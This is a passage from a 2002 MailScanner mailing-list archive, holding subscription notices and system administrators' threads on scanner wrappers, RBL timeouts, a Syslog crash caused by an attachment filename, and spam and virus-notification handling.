From LISTSERV at JISCMAIL.AC.UK Sun Sep 1 18:27:49 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:29 2006 Subject: MAILSCANNER: te@MATEMATIK.SU.SE requested to join Message-ID: <200209011727.SAA19546@magpie.ecs.soton.ac.uk> Sun, 1 Sep 2002 18:27:49 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Tomas Ericsson . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER te@MATEMATIK.SU.SE Tomas Ericsson The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+te%40MATEMATIK.SU.SE+Tomas+Ericsson&L=MAILSCANNER ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Sun, 1 Sep 2002 18:27:49 +0100 Received: from mail.matematik.su.se (pavidus.matematik.su.se [130.237.198.6]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g81HRmr22171 for ; Sun, 1 Sep 2002 18:27:48 +0100 Received: from te.matematik.su.se (te.matematik.su.se [130.237.198.69]) by mail.matematik.su.se (Postfix) with ESMTP id C91E63C0E6 for ; Sun, 1 Sep 2002 19:27:47 +0200 (CEST) Date: Sun, 1 Sep 2002 19:27:47 +0200 (CEST) From: Tomas Ericsson To: "L-Soft list server at JISCMAIL (1.8e)" Subject: Re: Command confirmation request (C638C0DB) In-Reply-To: <200209011711.g81HBec10396@mx1.su.se> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII From mailscanner at ecs.soton.ac.uk Mon Sep 2 11:31:46 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:29 2006 Subject: ORDB-RBL check doesn't increment In-Reply-To: <002b01c25259$37ecada0$6a0110ac@sbsplc.com> Message-ID: <5.1.0.14.2.20020902113119.0361c6d0@imap.ecs.soton.ac.uk> At 09:17 02/09/2002, you wrote: >Has anyone noticed that the ORDB-RBL check doesn't seem to increment? I see >repeated messages like this in my maillog: > >Sep 2 09:10:05 www mailscanner[17100]: RBL Check ORDB-RBL timed out and was >killed, consecutive failure 1 of 7 > >It always reads "consecutive failure 1 of 7". Are you sure it isn't succeeding sometimes (which will reset the counter to 0 again)? -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From paul-w at BLUEYONDER.CO.UK Mon Sep 2 09:17:46 2002 From: paul-w at BLUEYONDER.CO.UK (Paul Welsh) Date: Thu Jan 12 21:15:29 2006 Subject: ORDB-RBL check doesn't increment Message-ID: <002b01c25259$37ecada0$6a0110ac@sbsplc.com> Has anyone noticed that the ORDB-RBL check doesn't seem to increment? I see repeated messages like this in my maillog: Sep 2 09:10:05 www mailscanner[17100]: RBL Check ORDB-RBL timed out and was killed, consecutive failure 1 of 7 It always reads "consecutive failure 1 of 7". From LISTSERV at JISCMAIL.AC.UK Mon Sep 2 17:00:33 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:29 2006 Subject: MAILSCANNER: redjar@REDJAR.ORG requested to join Message-ID: <200209021600.RAA21426@magpie.ecs.soton.ac.uk> Mon, 2 Sep 2002 17:00:33 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Jared Benedict . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER redjar@REDJAR.ORG Jared Benedict The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+redjar%40REDJAR.ORG+Jared+Benedict&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Tue Sep 3 02:32:41 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:29 2006 Subject: MAILSCANNER: craig@WEBFARM.CO.NZ requested to join Message-ID: <200209030132.CAA02011@magpie.ecs.soton.ac.uk> Tue, 3 Sep 2002 02:32:41 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Craig St George . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER craig@WEBFARM.CO.NZ Craig St George The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+craig%40WEBFARM.CO.NZ+Craig+St+George&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From craig at WEBFARM.CO.NZ Tue Sep 3 08:37:04 2002 From: craig at WEBFARM.CO.NZ (Craig St George) Date: Thu Jan 12 21:15:29 2006 Subject: CommandAV wrapper Message-ID: <5.1.0.14.2.20020903193600.03b02ec0@192.168.0.88> Hi I have a copy of command AV version eg Command Software AntiVirus for Linux version 4.70.0 I see that there is no wrapper for command but there are options in the sweep.pl is it a matter of coping say the f-prot wrapper and changing the and setting the PackageDir and Scanner variables to that need d for casv eg PackageDir=/usr/bin Scanner=csav and setting sweep to the new copy made eg Sweep = /opt/MailScanner/csav/csavwrapper or do you simply place Sweep = /usr/bin/csav in the mailscanner.conf any ideas thanks From mailscanner at ecs.soton.ac.uk Tue Sep 3 09:48:04 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:29 2006 Subject: CommandAV wrapper In-Reply-To: <5.1.0.14.2.20020903193600.03b02ec0@192.168.0.88> Message-ID: <5.1.0.14.2.20020903094657.054b7be0@imap.ecs.soton.ac.uk> If there is no wrapper script, then just put the location of the virus-scanner binary (/usr/bin/csav) in the mailscanner.conf "Sweep" setting. But check there's no /opt/MailScanner/command directory on your system containing a wrapper script :-) At 08:37 03/09/2002, you wrote: >Hi I have a copy of command AV version >eg >Command Software AntiVirus for Linux version 4.70.0 > > >I see that there is no wrapper for command >but there are options in the sweep.pl > >is it a matter of coping say the f-prot wrapper and changing the >and setting the PackageDir and Scanner variables to >that need d for casv >eg >PackageDir=/usr/bin >Scanner=csav >and setting sweep to the new copy made >eg >Sweep = /opt/MailScanner/csav/csavwrapper > >or do you simply place >Sweep = /usr/bin/csav in the >mailscanner.conf > >any ideas >thanks -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From paul-w at BLUEYONDER.CO.UK Tue Sep 3 10:05:17 2002 From: paul-w at BLUEYONDER.CO.UK (Paul Welsh) Date: Thu Jan 12 21:15:29 2006 Subject: ORDB-RBL check doesn't increment References: <0e8972543230292PCOW029M@blueyonder.co.uk> Message-ID: <000501c25329$06473650$6a0110ac@sbsplc.com> ----- Original Message ----- > Date: Mon, 2 Sep 2002 11:31:46 +0100 > From: Julian Field > Subject: Re: ORDB-RBL check doesn't increment > > At 09:17 02/09/2002, you wrote: > >Has anyone noticed that the ORDB-RBL check doesn't seem to increment? I see > >repeated messages like this in my maillog: > > > >Sep 2 09:10:05 www mailscanner[17100]: RBL Check ORDB-RBL timed out and was > >killed, consecutive failure 1 of 7 > > > >It always reads "consecutive failure 1 of 7". > > Are you sure it isn't succeeding sometimes (which will reset the counter to > 0 again)? It's difficult to be 100% sure, but this looks pretty consecutive to me. These are from maillog and there are no lines between the entries: Sep 2 09:08:38 www mailscanner[17100]: RBL Check ORDB-RBL timed out and was killed, consecutive failure 1 of 7 Sep 2 09:08:49 www mailscanner[17100]: RBL Check ORDB-RBL timed out and was killed, consecutive failure 1 of 7 Sep 2 09:09:00 www mailscanner[17100]: RBL Check ORDB-RBL timed out and was killed, consecutive failure 1 of 7 Has anyone seen it working correctly, ie, with anything other than "consecutive failure 1 of 7"? From jethro.binks at STRATH.AC.UK Tue Sep 3 12:28:50 2002 From: jethro.binks at STRATH.AC.UK (Jethro R Binks) Date: Thu Jan 12 21:15:29 2006 Subject: Broken mail? Message-ID: <20020903122142.T61545-100000@defjam.cc.strath.ac.uk> Hello, has anyone come across this one. An attachment someone is sending causes mailscanner to break, with this message: Out of memory during "large" request for 2147487744 bytes, total sbrk() is 9665888 bytes at /usr/local/lib/perl5/5.6.1/sun4-solaris/Sys/Syslog.pm line 241. This blocks the queue processing and mail starts to build up. Can anyone suggest (for the benefit of the sender) what it is about this Word attachment that causes this to happen? The filename is: Content-Type: application/msword; name="frank%20-%2079515jv.ptsb3%2072022002e.trad.doc" (For possible privacy reasons, I've changed some of the plain alphanumerics here to other plain alphanumerics). It certainly looks odd, and the error is generated in the Syslog module, so it could be a message like this that is being generated and failing because of the oddness: Sep 3 12:24:02 khafre.cc.strath.ac.uk mailscanner[27623]: Found possible filename hiding in MVET_TOR.rtf.doc I'll suggest (when the queue dies down again!) renaming and resending to see if it is that document name. We're running quite an old version (with McAfee), so it's possible there will be some later changes in that module or elsewhere that will prevent this problem blocking the queue by now - I'll upgrade soon I promise! Jethro. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Jethro R Binks Computing Officer, IT Services Mailmaster, Listmaster, Webmaster, University Of Strathclyde, Glasgow, UK Cachemaster jethro.binks@strath.ac.uk From mailscanner at ecs.soton.ac.uk Tue Sep 3 15:10:42 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:29 2006 Subject: Broken mail? In-Reply-To: <20020903122142.T61545-100000@defjam.cc.strath.ac.uk> Message-ID: <5.1.0.14.2.20020903150621.04dabdc0@imap.ecs.soton.ac.uk> Are you running Perl 5.8? It looks like another occurrence of the problem discussed about 10 days ago, for which I posted a patch on this list. My message subject was "Re: Sys::Syslog Bug Report", dated 23/08/02. If you apply that patch, this should be fixed. Sorry I haven't had time to do a proper release of it, I've been rushed off my feet having just added 1 staff member's entire job to my current load (our Purchasing Manager is retiring). At 12:28 03/09/2002, you wrote: >Hello, has anyone come across this one. An attachment someone is sending >causes mailscanner to break, with this message: > >Out of memory during "large" request for 2147487744 bytes, total sbrk() is >9665888 bytes at /usr/local/lib/perl5/5.6.1/sun4-solaris/Sys/Syslog.pm >line 241. > >This blocks the queue processing and mail starts to build up. Can anyone >suggest (for the benefit of the sender) what it is about this Word >attachment that causes this to happen? The filename is: > >Content-Type: application/msword; > name="frank%20-%2079515jv.ptsb3%2072022002e.trad.doc" > >(For possible privacy reasons, I've changed some of the plain >alphanumerics here to other plain alphanumerics). It certainly looks odd, >and the error is generated in the Syslog module, so it could be a message >like this that is being generated and failing because of the oddness: > >Sep 3 12:24:02 khafre.cc.strath.ac.uk mailscanner[27623]: Found possible >filename hiding in MVET_TOR.rtf.doc > >I'll suggest (when the queue dies down again!) renaming and resending to >see if it is that document name. > >We're running quite an old version (with McAfee), so it's possible there >will be some later changes in that module or elsewhere that will prevent >this problem blocking the queue by now - I'll upgrade soon I promise! > >Jethro. > >. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . >. . . >Jethro R Binks Computing Officer, IT >Services >Mailmaster, Listmaster, Webmaster, University Of Strathclyde, >Glasgow, UK >Cachemaster >jethro.binks@strath.ac.uk -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From jethro.binks at STRATH.AC.UK Tue Sep 3 17:36:33 2002 From: jethro.binks at STRATH.AC.UK (Jethro R Binks) Date: Thu Jan 12 21:15:29 2006 Subject: Broken mail? In-Reply-To: <5.1.0.14.2.20020903150621.04dabdc0@imap.ecs.soton.ac.uk> Message-ID: <20020903173455.O61545-100000@defjam.cc.strath.ac.uk> It was indeed that subject that was the problem. The sender renamed the file more sensibly and it passed through without note. Perl 5.6.1 we're running. I'm well behind on MailScanner versions so I'll not worry about it too much unless I see it after I finally do upgrade some time. Jethro. On Tue, 3 Sep 2002, Julian Field wrote: > Are you running Perl 5.8? > It looks like another occurrence of the problem discussed about 10 days > ago, for which I posted a patch on this list. My message subject was "Re: > Sys::Syslog Bug Report", dated 23/08/02. > > If you apply that patch, this should be fixed. > > Sorry I haven't had time to do a proper release of it, I've been rushed off > my feet having just added 1 staff member's entire job to my current load > (our Purchasing Manager is retiring). > > At 12:28 03/09/2002, you wrote: > >Hello, has anyone come across this one. An attachment someone is sending > >causes mailscanner to break, with this message: > > > >Out of memory during "large" request for 2147487744 bytes, total sbrk() is > >9665888 bytes at /usr/local/lib/perl5/5.6.1/sun4-solaris/Sys/Syslog.pm > >line 241. > > > >This blocks the queue processing and mail starts to build up. Can anyone > >suggest (for the benefit of the sender) what it is about this Word > >attachment that causes this to happen? The filename is: > > > >Content-Type: application/msword; > > name="frank%20-%2079515jv.ptsb3%2072022002e.trad.doc" > > > >(For possible privacy reasons, I've changed some of the plain > >alphanumerics here to other plain alphanumerics). It certainly looks odd, > >and the error is generated in the Syslog module, so it could be a message > >like this that is being generated and failing because of the oddness: > > > >Sep 3 12:24:02 khafre.cc.strath.ac.uk mailscanner[27623]: Found possible > >filename hiding in MVET_TOR.rtf.doc > > > >I'll suggest (when the queue dies down again!) renaming and resending to > >see if it is that document name. > > > >We're running quite an old version (with McAfee), so it's possible there > >will be some later changes in that module or elsewhere that will prevent > >this problem blocking the queue by now - I'll upgrade soon I promise! > > > >Jethro. > > > >. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > >. . . > >Jethro R Binks Computing Officer, IT > >Services > >Mailmaster, Listmaster, Webmaster, University Of Strathclyde, > >Glasgow, UK > >Cachemaster > >jethro.binks@strath.ac.uk > > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Jethro R Binks Computing Officer, IT Services Mailmaster, Listmaster, Webmaster, University Of Strathclyde, Glasgow, UK Cachemaster jethro.binks@strath.ac.uk From mailscanner at ecs.soton.ac.uk Tue Sep 3 18:56:02 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:29 2006 Subject: Broken mail? In-Reply-To: <20020903173455.O61545-100000@defjam.cc.strath.ac.uk> References: <5.1.0.14.2.20020903150621.04dabdc0@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020903185419.023cb9d0@imap.ecs.soton.ac.uk> At 17:36 03/09/2002, you wrote: >It was indeed that subject that was the problem. The sender renamed the >file more sensibly and it passed through without note. > >Perl 5.6.1 we're running. I'm well behind on MailScanner versions so I'll >not worry about it too much unless I see it after I finally do upgrade >some time. Unless lots of other people need the fix (and can't get it off the mailing list), I'll continue directing my efforts to the major release, a month or two away at the moment. But if you want an interim release including that patch, do ask and I'll do it. >On Tue, 3 Sep 2002, Julian Field wrote: > > > Are you running Perl 5.8? > > It looks like another occurrence of the problem discussed about 10 days > > ago, for which I posted a patch on this list. My message subject was "Re: > > Sys::Syslog Bug Report", dated 23/08/02. > > > > If you apply that patch, this should be fixed. > > > > Sorry I haven't had time to do a proper release of it, I've been rushed off > > my feet having just added 1 staff member's entire job to my current load > > (our Purchasing Manager is retiring). > > > > At 12:28 03/09/2002, you wrote: > > >Hello, has anyone come across this one. An attachment someone is sending > > >causes mailscanner to break, with this message: > > > > > >Out of memory during "large" request for 2147487744 bytes, total sbrk() is > > >9665888 bytes at /usr/local/lib/perl5/5.6.1/sun4-solaris/Sys/Syslog.pm > > >line 241. > > > > > >This blocks the queue processing and mail starts to build up. Can anyone > > >suggest (for the benefit of the sender) what it is about this Word > > >attachment that causes this to happen? The filename is: > > > > > >Content-Type: application/msword; > > > name="frank%20-%2079515jv.ptsb3%2072022002e.trad.doc" > > > > > >(For possible privacy reasons, I've changed some of the plain > > >alphanumerics here to other plain alphanumerics). It certainly looks odd, > > >and the error is generated in the Syslog module, so it could be a message > > >like this that is being generated and failing because of the oddness: > > > > > >Sep 3 12:24:02 khafre.cc.strath.ac.uk mailscanner[27623]: Found possible > > >filename hiding in MVET_TOR.rtf.doc > > > > > >I'll suggest (when the queue dies down again!) renaming and resending to > > >see if it is that document name. > > > > > >We're running quite an old version (with McAfee), so it's possible there > > >will be some later changes in that module or elsewhere that will prevent > > >this problem blocking the queue by now - I'll upgrade soon I promise! > > > > > >Jethro. > > > > > >. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > > >. . . > > >Jethro R Binks Computing Officer, IT > > >Services > > >Mailmaster, Listmaster, Webmaster, University Of Strathclyde, > > >Glasgow, UK > > >Cachemaster > > >jethro.binks@strath.ac.uk > > > > -- > > Julian Field Teaching Systems Manager > > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > > Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > > > > >. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . >. . . >Jethro R Binks Computing Officer, IT >Services >Mailmaster, Listmaster, Webmaster, University Of Strathclyde, >Glasgow, UK >Cachemaster >jethro.binks@strath.ac.uk -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mkettler at EVI-INC.COM Tue Sep 3 19:15:04 2002 From: mkettler at EVI-INC.COM (Matt Kettler) Date: Thu Jan 12 21:15:29 2006 Subject: CommandAV wrapper In-Reply-To: <5.1.0.14.2.20020903094657.054b7be0@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020903193600.03b02ec0@192.168.0.88> Message-ID: <5.1.0.14.0.20020903134449.00b4a788@192.168.50.2> Personally, I use the f-prot wrapper with csav. Command AV is a derivative of f-prot anyway, and from what I can tell from the docs, this should be the right way. I don't think there's ever been a dedicated "command" directory, since these two scanners have the same commandline, and only very minor differences in output. It is still important to set the proper scanner option in mailscanner.conf.. for my version it is: Virus Scanner = command (might have changed to csav in newer versions as Julian said) trying to run it with the f-prot settings in mailscanner.conf causes problems because the csav version has slightly different "last-line" output if I recall correctly. I'm running Mailscanner 3.20-6, and the only diff between the tarball's f-protwrapper and my "csav-wrapper" is: < PackageDir=/usr/bin # This may vary depending on your OS < Scanner=csav --- > PackageDir=/usr/local/f-prot # This may vary depending on your OS > Scanner=f-prot Works great for me. At 09:48 AM 9/3/2002 +0100, Julian Field wrote: >If there is no wrapper script, then just put the location of the >virus-scanner binary (/usr/bin/csav) in the mailscanner.conf "Sweep" >setting. But check there's no /opt/MailScanner/command directory on your >system containing a wrapper script :-) > >At 08:37 03/09/2002, you wrote: >>Hi I have a copy of command AV version >>eg >>Command Software AntiVirus for Linux version 4.70.0 >> >> >>I see that there is no wrapper for command >>but there are options in the sweep.pl >> >>is it a matter of coping say the f-prot wrapper and changing the >>and setting the PackageDir and Scanner variables to >>that need d for casv >>eg >>PackageDir=/usr/bin >>Scanner=csav >>and setting sweep to the new copy made >>eg >>Sweep = /opt/MailScanner/csav/csavwrapper >> >>or do you simply place >>Sweep = /usr/bin/csav in the >>mailscanner.conf >> >>any ideas >>thanks > >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ From mrl at GENSTEAM.COM Wed Sep 4 00:26:49 2002 From: mrl at GENSTEAM.COM (Mary Ross Lynch) Date: Thu Jan 12 21:15:29 2006 Subject: Spam Action Message-ID: <00ab01c253a1$60965460$370410ac@ns.uu.net> Things are working fine with mailscanner and sophos. And I have recently started using spamassassin, installed within mailscanner. Everything there working pretty good, except that I would like to send all messages thought to be spam (tagged with {SPAM?}), to an email addess: spam@domain.com for admins to monitor in order that no legit email is lost. It's important for our company that all valid email be delivered. As far as I have been able to see, the only spam action options are: Delete Deliver (I assume that this means deliver to the recipient(s), not configurable) Store I have tried the "Store" option together with df2mbox (in quarantine) but not really satisfactory in order to monitor and forward any valid email to recipients. Any ideas? TIA, Mary Lynch From jim at ENTROPHY-FREE.NET Wed Sep 4 05:48:54 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:29 2006 Subject: Spam Action In-Reply-To: <00ab01c253a1$60965460$370410ac@ns.uu.net> References: <00ab01c253a1$60965460$370410ac@ns.uu.net> Message-ID: <1031114937.14059.18.camel@chaos.entrophy-free.net> On Tue, 2002-09-03 at 18:26, Mary Ross Lynch wrote: > Things are working fine with mailscanner and sophos. And I have recently started using > spamassassin, installed within mailscanner. Everything there working pretty good, except > that I would like to send all messages thought to be spam (tagged with {SPAM?}), to an > email addess: > > spam@domain.com > > for admins to monitor in order that no legit email is lost. It's important for our > company that all valid email be delivered. > Any anti-spam filter is going to generate at least some false positives. And it can be difficult for someone other than the intended recipient to determine that a message tagged as being spam is legitimate in some cases. I personally believe that any email filter system should do the least damage to the mail stream that is possible, but still provide the information for the end user to take for spam control. Just about every email client can be set up to filter according to personal preference and that moves the bulk of the responsibility to the user. And you aren't necessarily limited to a single level of spam notification. I use a modified copy of MailScanner that makes it easy for a user to use a local filter (or a Sieve filter on my servers) to selectively discard or allow messages identified as possible spam by SpamAssassin. You certainly could modify MailScanner to mail the "SPAM" messages somewhere, but I think it would make more sense to use a per client filter, like procmail or Sieve (it you use a Cyrus implementation). Either of those allows the end user to tailor their "spam tolerance" and both are capable of forwarding selected mail somewhere else. -- The instructions said to use Windows 98 or better, so I installed RedHat. From mailscanner at ecs.soton.ac.uk Wed Sep 4 07:30:01 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:29 2006 Subject: Spam Action In-Reply-To: <00ab01c253a1$60965460$370410ac@ns.uu.net> Message-ID: <5.1.0.14.2.20020904072843.03a03ea0@imap.ecs.soton.ac.uk> At 00:26 04/09/2002, you wrote: >Things are working fine with mailscanner and sophos. And I have recently >started using >spamassassin, installed within mailscanner. Everything there working >pretty good, except >that I would like to send all messages thought to be spam (tagged with >{SPAM?}), to an >email addess: > spam@domain.com >for admins to monitor in order that no legit email is lost. It's important >for our >company that all valid email be delivered. The next major release will be able to do this. This should be ready in a month or two. It's really awkward to fit into the current "architecture", but I'm determined to put it in the new code. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From rabellino at DI.UNITO.IT Wed Sep 4 10:04:39 2002 From: rabellino at DI.UNITO.IT (Rabellino Sergio) Date: Thu Jan 12 21:15:29 2006 Subject: Sender not notified ... Message-ID: <3D75CCA7.1C4412FC@di.unito.it> Dear list (and mostly Julian ...) I've seen a strange behaviour in my logs: an email containing the virus W32/HiGuy is catched successfully by mcafee/mailscanner, but no notification are sent to the sender... From the sendmail log I can see that the "from" address is "<>", so mailscanner could not send the virus alert back to the sender (correctly I suppose ...) Now the question : In the body of the message there is a real from address, it's too hard use also this information, almost in the case the from address in the smtp protocol is empty ? ... or am I wrong ? -- Dott. Sergio Rabellino Technical Staff Department of Computer Science University of Torino (Italy) Member of the Internet Society http://www.di.unito.it/~rabser Tel. +39-0116706701 Fax. +39-011751603 From Q.G.Campbell at NEWCASTLE.AC.UK Wed Sep 4 10:24:17 2002 From: Q.G.Campbell at NEWCASTLE.AC.UK (Quentin Campbell) Date: Thu Jan 12 21:15:29 2006 Subject: Feature request! Message-ID: The ability to chose an A-V product from a largish range and use that with MailScanner is good. Even better is the ability to run two or more of those A-V products in "series" (we do this using Sophos & McAfee). I would like to do something similar with the anti-spam tool. At present only SpamAssassin seems to be on offer. It would be nice if there was a well defined API offered by MailScanner that allowed alternative anti-spam products or home-grown software to be used. Even better if two or more anti-spam packages can be run in "series". The motivation for this request is to be able to experiment with some home-written anti-spam software, for example, a Bayesian filter (see http://www.paulgraham.com/spam.html). Quentin --- PHONE: +44 191 222 8209 Computing Service, University of Newcastle FAX: +44 191 222 8765 Newcastle upon Tyne, United Kingdom, NE1 7RU. ------------------------------------------------------------------------ "Any opinion expressed above is mine. The University can get its own." From mailscanner at ecs.soton.ac.uk Wed Sep 4 10:51:41 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:29 2006 Subject: Sender not notified ... In-Reply-To: <3D75CCA7.1C4412FC@di.unito.it> Message-ID: <5.1.0.14.2.20020904105100.03a44378@imap.ecs.soton.ac.uk> At 10:04 04/09/2002, you wrote: >Dear list (and mostly Julian ...) > I've seen a strange behaviour in my logs: > an email containing the virus W32/HiGuy is catched successfully by > mcafee/mailscanner, but no notification are sent to the sender... From >the sendmail log I can see that the "from" address is "<>", so mailscanner >could not send the virus alert back to the sender (correctly I >suppose ...) >Now the question : In the body of the message there is a real from >address, it's too hard use also this information, almost in the case the >from address in the smtp protocol is empty ? Is the "From:" address genuine? -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Wed Sep 4 10:52:36 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:29 2006 Subject: Feature request! In-Reply-To: Message-ID: <5.1.0.14.2.20020904105211.0181c568@imap.ecs.soton.ac.uk> I will try to write the new release in a way that will help you do this, but no promises... At 10:24 04/09/2002, you wrote: >The ability to chose an A-V product from a largish range and use that >with MailScanner is good. Even better is the ability to run two or more >of those A-V products in "series" (we do this using Sophos & McAfee). > >I would like to do something similar with the anti-spam tool. At present >only SpamAssassin seems to be on offer. It would be nice if there was a >well defined API offered by MailScanner that allowed alternative >anti-spam products or home-grown software to be used. Even better if two >or more anti-spam packages can be run in "series". > >The motivation for this request is to be able to experiment with some >home-written anti-spam software, for example, a Bayesian filter (see >http://www.paulgraham.com/spam.html). > >Quentin >--- >PHONE: +44 191 222 8209 Computing Service, University of Newcastle >FAX: +44 191 222 8765 Newcastle upon Tyne, United Kingdom, NE1 7RU. >------------------------------------------------------------------------ >"Any opinion expressed above is mine. The University can get its own." -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From rabellino at DI.UNITO.IT Wed Sep 4 11:43:33 2002 From: rabellino at DI.UNITO.IT (Rabellino Sergio) Date: Thu Jan 12 21:15:29 2006 Subject: Sender not notified ... References: <5.1.0.14.2.20020904105100.03a44378@imap.ecs.soton.ac.uk> Message-ID: <3D75E3D5.C4F14CE2@di.unito.it> Julian Field wrote: > > At 10:04 04/09/2002, you wrote: > >Dear list (and mostly Julian ...) > > I've seen a strange behaviour in my logs: > > an email containing the virus W32/HiGuy is catched successfully by > > mcafee/mailscanner, but no notification are sent to the sender... From > >the sendmail log I can see that the "from" address is "<>", so mailscanner > >could not send the virus alert back to the sender (correctly I > >suppose ...) > >Now the question : In the body of the message there is a real from > >address, it's too hard use also this information, almost in the case the > >from address in the smtp protocol is empty ? > > Is the "From:" address genuine? Yes, almost as can be genuine the from used in the smtp protocol .... The dark side is that you can get more "undeliverable" messages (from not genuine), but you can achieve better the goal "notify to sender the infection". Tks. -- Dott. Sergio Rabellino Technical Staff Department of Computer Science University of Torino (Italy) Member of the Internet Society http://www.di.unito.it/~rabser Tel. +39-0116706701 Fax. +39-011751603 From henrik at LEWANDER.COM Wed Sep 4 12:11:47 2002 From: henrik at LEWANDER.COM (Henrik Lewander) Date: Thu Jan 12 21:15:29 2006 Subject: Sender not notified ... References: <5.1.0.14.2.20020904105100.03a44378@imap.ecs.soton.ac.uk> <3D75E3D5.C4F14CE2@di.unito.it> Message-ID: <034b01c25403$de109920$05c6a8c0@gbg.bluelabs.se> > > Is the "From:" address genuine? > Yes, almost as can be genuine the from used in the smtp protocol .... > The dark side is that you can get more "undeliverable" messages (from not genuine), but you can achieve better the goal "notify to sender > the infection". Btw, does someone have a nice way of dealing with all the undeliverable messages you get when mailscanner sends virus warnings to nonexistant addresses? I don't care about those error messages but they are filling up my postmaster inbox. Regards, Henrik From rabellino at DI.UNITO.IT Wed Sep 4 12:15:26 2002 From: rabellino at DI.UNITO.IT (Rabellino Sergio) Date: Thu Jan 12 21:15:29 2006 Subject: Sender not notified ... References: <5.1.0.14.2.20020904105100.03a44378@imap.ecs.soton.ac.uk> <3D75E3D5.C4F14CE2@di.unito.it> <034b01c25403$de109920$05c6a8c0@gbg.bluelabs.se> Message-ID: <3D75EB4E.3CA66F58@di.unito.it> Henrik Lewander wrote: > > > > Is the "From:" address genuine? > > Yes, almost as can be genuine the from used in the smtp protocol .... > > The dark side is that you can get more "undeliverable" messages (from not > genuine), but you can achieve better the goal "notify to sender > > the infection". > > Btw, does someone have a nice way of dealing with all the undeliverable > messages you get when mailscanner sends virus warnings to nonexistant > addresses? I don't care about those error messages but they are filling up > my postmaster inbox. > > Regards, > Henrik Set-up a mail filter in your MUA and send them to the trash immediately .... I can't see any other way ... -- Dott. Sergio Rabellino Technical Staff Department of Computer Science University of Torino (Italy) Member of the Internet Society http://www.di.unito.it/~rabser Tel. +39-0116706701 Fax. +39-011751603 From derek at csolve.net Wed Sep 4 14:42:48 2002 From: derek at csolve.net (Derek Buttineau) Date: Thu Jan 12 21:15:29 2006 Subject: Mailscanner and SA 2.40 Message-ID: <00ea01c25418$f52bec80$8850a4cf@derek> Anyone else tried this combination yet? In my testing 2.40 seems to cause issue with Mailscanner operation.. though 2.31 works perfectly fine.. It seems with 2.40 in place a lot of mail never makes it from the inbound queue to the outbound queue, though no error 